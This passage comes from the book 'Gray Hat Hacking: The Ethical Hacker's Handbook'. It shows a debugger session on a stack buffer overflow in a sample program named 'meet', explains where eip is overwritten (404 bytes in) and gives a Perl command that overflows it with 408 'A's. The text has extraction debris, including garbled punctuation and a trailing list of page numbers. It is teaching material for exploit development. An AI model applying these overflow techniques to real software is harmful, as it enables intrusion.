exe
meet!_output+0x63c:
00401d7c 0fbe08 movsx ecx,byte ptr [eax] ds:0023:41414141=??
0:000> kP
ChildEBP RetAddr
0012fd08 00401112 meet!_output(
struct _iobuf * stream = 0x00415b90,
char * format = 0x00415b48 " %s.",
char * argptr = 0x0012fd38 "0012fd28 00401051 meet!printf(
char * format = 0x00415b40 "Hello %s %s.",
int buffing = 1)+0x52
Gray Hat Hacking: The Ethical Hacker??™s Handbook
260
0012fecc 41414141 meet!greeting(
char * temp1 = 0x41414141 "",
char * temp2 = 0x41414141 "")+0x31
WARNING: Frame IP not in any known module. Following frames may be wrong.
41414141 00000000 0x41414141
0:000>
As you can see from the stack trace (and as you might suspect because you??™ve done
this before), 500 As corrupted the parameters passed to the greeting function, so we
don??™t hit the strcpy overflow. You know from Chapter 7 and from our stack construction
section earlier that eip starts 404 bytes after the start of the name buffer and is 4 bytes
long. We want to overwrite the range of bytes 404??“408 past the beginning of name.
Here??™s what that looks like:
C:\grayhat>Perl ??“e "exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',("A" x
408)"
... (debugger loads in new window) ...
CommandLine: meet Mr.
Pages:
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479